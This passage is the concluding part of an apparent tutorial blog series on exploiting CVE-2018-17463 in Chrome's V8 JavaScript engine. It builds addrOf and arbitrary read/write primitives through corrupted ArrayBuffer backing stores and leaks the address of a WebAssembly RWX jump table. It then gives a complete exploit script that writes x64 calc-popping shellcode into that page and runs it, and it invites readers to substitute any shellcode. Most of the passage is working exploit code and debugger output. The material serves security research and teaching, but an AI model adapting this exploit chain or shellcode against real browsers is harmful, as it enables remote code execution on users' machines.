In this case it seems that the address of 0x556C400000 will be our jump table entry for the RWX memory region. Let’s validate if our WasmInstanceObject does in fact store this pointer by examining the memory contents of the wasmInstace object address within WinDbg.

0:004> dq 0000032B465226A9-1 L22
0000032b`465226a8  000002d1`cc30ae51 000000bc`a7c82cf1
0000032b`465226b8  000000bc`a7c82cf1 00000135`bd78e159
0000032b`465226c8  00000135`bd78e341 0000032b`465039f9
0000032b`465226d8  0000032b`465227a9 000000bc`a7c825a1
0000032b`465226e8  000000bc`a7c825a1 000000bc`a7c825a1
0000032b`465226f8  000000bc`a7c825a1 000000bc`a7c82cf1
0000032b`46522708  000000bc`a7c82cf1 000000bc`a7c825a1
0000032b`46522718  00000135`bd78e2d1 000000bc`a7c825a1
0000032b`46522728  000000bc`a7c825a1 000000bc`a7c822a1
0000032b`46522738  00000097`8399dba1 00000273`516a0000
0000032b`46522748  00000000`00010000 00000000`0000ffff
0000032b`46522758  00000272`d08d45f8 00000272`d08dc6c8
0000032b`46522768  00000272`d08dc6b8 00000272`d08c73d0
0000032b`46522778  00000000`00000000 00000272`d08c7410
0000032b`46522788  00000000`00000000 00000000`00000000
0000032b`46522798  00000055`6c400000 000000bc`00000000
0000032b`465227a8  000002d1`cc30b851 000000bc`a7c82cf1

After analyzing the output, we can see that our jump table entry pointer to the RWX memory page is indeed stored within our wasmInstance object at the address of 0x32b46522798!

From here, we can do some simple hexadecimal math to find the offset to the RWX page from the base address of the WasmInstanceObject minus 1 (due to pointer tagging).

0x798 – (0x6A9-0x1) =Β 0xF0 (240)

With this, we know that the offset of the jump table is 240 bytes, or 0xF0, away from the base address of the instance object.

With this, we can now update our exploit script by adding the WebAssembly sample code from above and then attempt to leak the RWX address of the jump table entry!

However, we have a slight problem. Unfortunately, we can’t use our addrOf primitive to leak the object address anymore. The reason for this is that the addrOf primitive abuses our bug by overwriting the overlapping properties. This essentially would destroy our memory read/write primitive that we set up via our array buffers, resulting in writing to wrong memory regions and potentially causing a crash.

In this case, we need to utilize our memory read/write primitive via our array buffers to leak an object address. Using what we already have, we can build another addrOf primitive via our array buffers by doing the following;

  1. Add an out-of-line property to the second array buffer.
  2. Leak the address of the second array buffers property store.
  3. Use the read64 memory primitive to read the address of our object at offset 16 in the property store.

Before we implement this, let’s see how this looks like in memory to confirm that it will work. Let’s start by creating a new array buffer called arrBuf1 and then create a random object, like so.

d8> let arrBuf1 = new ArrayBuffer(1024);
d8> let obj = {x:1}

Next, let’s set a new out of line property for arrBuf1 called leakme and set our object as it’s value.

d8> arrBuf1.leakme = obj;

If we run the %DebugPrint command against arrBuf1 we will see that we now have a new out-of-line property stored within the properties data store.

d8> %DebugPrint(arrBuf1)
DebugPrint: 000003B88950D8B9: [JSArrayBuffer]
 - map: 0x02fd7d78c251 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x01d6b8c90b21 <Object map = 000002FD7D7843C1>
 - elements: 0x03bfa9d82cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 00000181293E0780
 - byte_length: 1024
 - neuterable
 - properties: 0x03b88950fe29 <PropertyArray[3]> {
    #leakme: 0x03b88950f951 <Object map = 000002FD7D78C201> (data field 0) properties[0]
 }
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As we can see, the address for obj is 0x03b88950f951 as per the property store. If we were to look into our property store for arrBuf1 with WinDbg we can see that at offset 16 in the property store, we have the address of our object!

0:005> dq 0x03b88950fe29-1 L6
000003b8`8950fe28  000003bf`a9d83899 00000003`00000000
000003b8`8950fe38  000003b8`8950f951 000003bf`a9d825a1
000003b8`8950fe48  000003bf`a9d825a1 000002fd`7d784fa1

Alright, we confirmed that this works. In that case let’s go ahead and implement a new addrOf function for our memory read/write primitive as follows:

let memory = {
  addrOf(obj) {
    // Set object address to new out-of-line property called leakme
    arrBuf2.leakMe = obj;
    // Use read64 primitive to leak the properties backing store address of our array buffer
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    // Read offset 16 from the array buffer backing store and return the address of our object
    return this.read64(props + 16n) - 1n;
  }
};

With that implemented, we can finally updated our exploit script to include the new addrOf primitive and our WebAssembly code. Afterwards, we can attempt to leak the address of our wasmInstance and the instances RWX jump table page.

The updated script will look like so:

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct our Memory Read and Write Primitive
let memory = {
  read64(addr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    return view2[0];
  },
  write64(addr, ptr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    view2[0] = ptr;
  },
  addrOf(obj) {
    arrBuf2.leakMe = obj;
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    return this.read64(props + 16n) - 1n;
  }
};
print("[+] Constructed Memory Read and Write Primitive!");

// Generate RWX region via WASM
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

// Leak WasmInstance Address
let wasmInstanceAddr = memory.addrOf(wasmInstance);
print(`[+] WASM Instance Address: 0x${wasmInstanceAddr.toString(16)}`);
// Leak
let wasmRWXAddr = memory.read64(wasmInstanceAddr + 0xF0n);
print(`[+] WASM RWX Page Address: 0x${wasmRWXAddr.toString(16)}`);

Upon executing the updated script in d8, we will notice the following output.

[+] Finding Overlapping Properties...
[+] Properties p6 and p18 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x37779c8db50
[+] Corrupting ArrayBuffer Backing Store Address...
[+] Constructed Memory Read and Write Primitive!
[+] WASM Instance Address: 0x2998447e580
[+] WASM RWX Page Address: 0x47f9400000

It appears that we successfully were able to leak the address to our wasmInstance as well as our jump_table_start pointer.

To confirm that the leaked addresses are valid, we can use WinDbg to inspect the wasmInstance address to validate the object structure and check if at offset 240 we have our jump table address.

0:000> dq 0x2998447e580 L22
00000299`8447e580  000002da`4608ae51 0000005a`4e802cf1
00000299`8447e590  0000005a`4e802cf1 00000191`5d8d03d1
00000299`8447e5a0  00000191`5d8d05b9 000000ea`a9d839f9
00000299`8447e5b0  00000299`8447e681 0000005a`4e8025a1
00000299`8447e5c0  0000005a`4e8025a1 0000005a`4e8025a1
00000299`8447e5d0  0000005a`4e8025a1 0000005a`4e802cf1
00000299`8447e5e0  0000005a`4e802cf1 0000005a`4e8025a1
00000299`8447e5f0  00000191`5d8d0549 0000005a`4e8025a1
00000299`8447e600  0000005a`4e8025a1 0000005a`4e8022a1
00000299`8447e610  0000009a`1229dba1 000001fd`60c00000
00000299`8447e620  00000000`00010000 00000000`0000ffff
00000299`8447e630  000001fc`dff063c8 000001fc`dff0e498
00000299`8447e640  000001fc`dff0e488 000001fc`e0a00b50
00000299`8447e650  00000000`00000000 000001fc`e0a02720
00000299`8447e660  00000000`00000000 00000000`00000000
00000299`8447e670  00000047`f9400000 0000005a`00000000
00000299`8447e680  000002da`4608b851 0000005a`4e802cf1

Upon inspection of the memory, we confirm that we successfully are leaking valid addresses as 000002998447e670 contains the pointer to our jump table start entry!

Alright, we’re nearing the final stretch! Now that we have a valid jump table address that points to a RWX memory page, all we have to do is write our shellcode to that memory region, and then trigger our WebAssembly function to execute the code!

For this blog post, I will be using a Null-Free WinExec PopCalc shellcode that will simply execute the calculator app upon successful execution. Of course, it’s up to the reader to implement whatever shellcode they want for their own script!

Since our original WebAssembly code is using a Uint8Array, we’ll have to make sure that we wrap our shellcode in the same typed array representation. An example of how our pop calc shellcode will look like in our script can be seen below.

// Prepare Calc Shellcode
let shellcode = new Uint8Array([0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6]);

After preparing our shellcode, we now need to add a new memory write primitive via our array buffers, since our current write64 function only writes data using the BigUint64Array representation.

For this write primitive, we can reuse the code for write64, but with two minor changes. First of all, we need to make view2 a Uint8Array instead of a BigUint64Array. Second of all, to write our full shellcode via our view, we will call the set function. This allows us to store multiple values in the array buffer instead of just using an index as before.

The new write memory primitive will look like so:

let memory = {
  write(addr, bytes) {
    view1[4] = addr;
    let view2 = new Uint8Array(arrBuf2);
    view2.set(bytes);
  }
};

With that completed, all that’s left to do is to update the exploit script to include the new write primitive, add our shellcode, write it to the leaked jump table address, and finally call our WebAssembly function to execute our shellcode!

The final updated exploit script will look like so.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address @ 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct Memory Primitives via Array Buffers
let memory = {
  write(addr, bytes) {
    view1[4] = addr;
    let view2 = new Uint8Array(arrBuf2);
    view2.set(bytes);
  },
  read64(addr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    return view2[0];
  },
  write64(addr, ptr) {
    view1[4] = addr;
    let view2 = new BigUint64Array(arrBuf2);
    view2[0] = ptr;
  },
  addrOf(obj) {
    arrBuf2.leakMe = obj;
    let props = this.read64(arrBuf2Addr + 8n) - 1n;
    return this.read64(props + 16n) - 1n;
  }
};

print("[+] Constructed Memory Read and Write Primitive!");

print("[+] Generating a WebAssembly Instance...");

// Generate RWX region for Shellcode via WASM
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

// Leak WebAssembly Instance Address and Jump Table Start Pointer
print("[+] Leaking WebAssembly Instance Address...");
let wasmInstanceAddr = memory.addrOf(wasmInstance);
print(`[+] WebAssembly Instance Address @ 0x${wasmInstanceAddr.toString(16)}`);
let wasmRWXAddr = memory.read64(wasmInstanceAddr + 0xF0n);
print(`[+] WebAssembly RWX Jump Table Address @ 0x${wasmRWXAddr.toString(16)}`);

print("[+] Preparing Shellcode...");
// Prepare Calc Shellcode
let shellcode = new Uint8Array([0x48,0x31,0xff,0x48,0xf7,0xe7,0x65,0x48,0x8b,0x58,0x60,0x48,0x8b,0x5b,0x18,0x48,0x8b,0x5b,0x20,0x48,0x8b,0x1b,0x48,0x8b,0x1b,0x48,0x8b,0x5b,0x20,0x49,0x89,0xd8,0x8b,0x5b,0x3c,0x4c,0x01,0xc3,0x48,0x31,0xc9,0x66,0x81,0xc1,0xff,0x88,0x48,0xc1,0xe9,0x08,0x8b,0x14,0x0b,0x4c,0x01,0xc2,0x4d,0x31,0xd2,0x44,0x8b,0x52,0x1c,0x4d,0x01,0xc2,0x4d,0x31,0xdb,0x44,0x8b,0x5a,0x20,0x4d,0x01,0xc3,0x4d,0x31,0xe4,0x44,0x8b,0x62,0x24,0x4d,0x01,0xc4,0xeb,0x32,0x5b,0x59,0x48,0x31,0xc0,0x48,0x89,0xe2,0x51,0x48,0x8b,0x0c,0x24,0x48,0x31,0xff,0x41,0x8b,0x3c,0x83,0x4c,0x01,0xc7,0x48,0x89,0xd6,0xf3,0xa6,0x74,0x05,0x48,0xff,0xc0,0xeb,0xe6,0x59,0x66,0x41,0x8b,0x04,0x44,0x41,0x8b,0x04,0x82,0x4c,0x01,0xc0,0x53,0xc3,0x48,0x31,0xc9,0x80,0xc1,0x07,0x48,0xb8,0x0f,0xa8,0x96,0x91,0xba,0x87,0x9a,0x9c,0x48,0xf7,0xd0,0x48,0xc1,0xe8,0x08,0x50,0x51,0xe8,0xb0,0xff,0xff,0xff,0x49,0x89,0xc6,0x48,0x31,0xc9,0x48,0xf7,0xe1,0x50,0x48,0xb8,0x9c,0x9e,0x93,0x9c,0xd1,0x9a,0x87,0x9a,0x48,0xf7,0xd0,0x50,0x48,0x89,0xe1,0x48,0xff,0xc2,0x48,0x83,0xec,0x20,0x41,0xff,0xd6]);

print("[+] Writing Shellcode to Jump Table Address...");
// Write Shellcode to Jump Table Start Address
memory.write(wasmRWXAddr, shellcode);

// Execute our Shellcode
print("[+] Popping Calc...");
func();

It’s time to execute our exploit! If everything goes as planed, once the WebAssembly function get’s called, it should execute our shellcode, and the calculator should pop up!

Alright, the moment of truth. Let’s see this bad boy in action!

And there we have it! Our exploit script works and we’re able to successfully execute our shellcode!

Closing

Well there we have it! After spending three months learning about Chrome and V8 internals, we were able to successfully analyze and exploit CVE-2018-17463! This was no small feat, as Chrome exploitation is a complex and challenging task.

Throughout the series, we have built a strong foundation of knowledge that has prepared us to tackle the more complex task of Chrome exploitation. At the end, we were able to successfully analyze and exploit a real-world vulnerability in Chrome, demonstrating the practical application of the concepts we have learned.

Overall, this series has written to provide a detailed and in-depth look at the world of Chrome exploitation, and I hope it has been both informative and useful for you, the reader. Whether you are a seasoned security researcher or just starting out, I hope you have gained valuable insights and knowledge from this series.

I want to sincerely thank you for for sticking around to the end and for your interest in this topic!

With that being said, for those interested, the final exploit code for this project has been added to theΒ CVE-2018-17463Β repository on my Github.

Thank you for reading, cheers!

Kudos

I would like to sincerely thank V3ded for taking the time to do a thorough proofread of this post for accuracy and readability! Thank you!

References

❌
❌